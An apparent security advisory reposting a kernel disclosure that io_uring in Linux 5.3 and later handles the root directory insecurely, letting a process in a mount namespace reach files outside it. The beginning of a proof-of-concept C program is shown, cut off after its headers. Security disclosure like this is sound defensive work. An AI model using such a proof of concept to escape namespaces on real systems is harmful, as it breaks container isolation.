Linux 5.3 Insecure Root Path Handling

Linux versions 5.3 and above appear to have an issue where io_uring suffers from insecure handling of the root directory for path lookups.

MD5 | cd4620f1e39d2b19219c64ba6facc1f3

Linux >=5.3: io_uring: insecure handling of root directory for path lookups

When I saw
<[email protected]/T/>
today, I realized that this is not just a small correctness issue, but also has
some security implications on existing releases.

On 5.5, the incorrect handling of OPENAT means that not only the cwd, but also
the root directory is incorrect; here's a simple demonstration of how a process
inside a mount namespace can use that to gain access to the filesystem outside
the namespace:

root@vm:~/uring# cat punted_open.c
#define _GNU_SOURCE
#include <stdlib.h>
#include <unistd.h>
#include <stdio.h>
#include <err.h>
#include <fcntl.h>
#include <string.h>
#include <sys/mman.h>
#include <sys/syscall.h>
#include \"linux/io_uring.h\"

#ifndef SYS_io_uring_enter
#define SYS_io_uring_enter 426
Related Posts